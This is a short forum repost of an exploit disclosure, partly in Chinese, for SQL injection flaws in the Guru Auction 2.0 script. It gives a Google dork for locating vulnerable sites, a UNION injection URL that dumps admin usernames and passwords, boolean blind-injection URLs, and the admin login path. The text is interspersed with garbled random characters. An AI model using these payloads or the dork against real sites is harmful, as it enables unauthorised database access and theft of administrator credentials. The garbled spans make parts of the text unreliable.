Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
# [$ Z0 h# k: E- Y( O* z
7 d5 [5 Z J) l$ t2 P2 i$ w! ~$ H作者 : v3n0m- {' x# [, n9 p
应用 : Guru Auction 2.0' w: C* p3 v6 R# K/ u& h
Price : $49
' a8 [8 H& U' m# |. W$ KVendor : http://www.guruscript.com/
" O0 z; E$ B) ]7 ` I! V9 PGoogle Dork : inurl:subcat.php?cate_id=; P0 ^/ f4 C, c! p6 o( X
& l7 D% M' C- K3 f4 K
SQLi p0c:$ X4 q$ N1 N% l" v# D5 W
~~~~~~~~~~1 x$ w, l( d& C R. Z' c6 m( K
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
. ~7 m6 O' t2 J6 {$ W7 J, j
$ \) S8 a$ B6 H 7 ~' Q G( Y+ U/ w6 S, e' R
盲注 p0c:
7 [' H: X4 X* _+ m~~~~~~~~~~ Z0 r/ e* x& k, x4 W" J4 _
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true2 Q; W1 X, C1 ]) K$ N2 y
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
2 z- h& S+ X1 o
$ `$ i9 j# R" ]% G管理登录入口:
& [- Z# P; ~* R( m~~~~~~~~~~, Q$ G5 @- f% s; n
http://domain.tld/[path]/admin/
$ w* ]! q3 i0 k3 T/ | |
发表于 2012-12-31 09:24:05
收藏
支持
反对